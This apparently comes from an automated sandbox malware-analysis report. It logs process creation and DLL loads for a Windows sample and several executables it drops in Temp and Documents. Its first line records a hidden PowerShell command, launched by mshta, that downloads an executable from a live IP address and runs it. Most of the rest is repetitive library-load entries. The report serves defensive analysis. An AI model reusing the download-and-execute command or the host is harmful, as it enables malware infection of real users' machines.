                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: winhttp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: webio.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: mswsock.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: iphlpapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: winnsi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: dnsapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: rasadhlp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: fwpuclnt.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: schannel.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: mskeyprotect.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: ntasn1.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: ncrypt.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: ncryptsslp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: msasn1.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: cryptsp.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: rsaenh.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: cryptbase.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: gpapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: dpapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: wbemcomn.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: amsi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: version.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: rstrtmgr.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: ncrypt.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: ntasn1.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: winhttp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: mswsock.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: iphlpapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: winnsi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: dpapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: cryptbase.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: dnsapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: rasadhlp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: fwpuclnt.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: ntmarta.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: mozglue.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: wsock32.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: vcruntime140.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: msvcp140.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: pcacli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: mpr.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSection loaded: sfc_os.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: mstask.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: mpr.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: dui70.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: duser.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: chartv.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: oleacc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: atlthunk.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: textinputframework.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: coreuicomponents.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: coremessaging.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: ntmarta.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: wtsapi32.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: winsta.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: textshaping.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: explorerframe.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: mstask.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: mstask.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: mpr.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: dnsapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: rasadhlp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: fwpuclnt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: schannel.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mskeyprotect.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ntasn1.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: msasn1.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: dpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: cryptsp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: rsaenh.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: cryptbase.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: gpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ncrypt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ncryptsslp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: winmm.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: urlmon.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: iertutil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: srvcli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: netutils.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: dpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: cryptbase.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSection loaded: mswsock.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: mscoree.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: version.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: profapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: cryptsp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: rsaenh.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: cryptbase.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: dnsapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: dhcpcsvc6.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: dhcpcsvc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: winnsi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: rasapi32.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: rasman.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: rtutils.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: mswsock.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: winhttp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: rasadhlp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: fwpuclnt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeSection loaded: secur32.dll
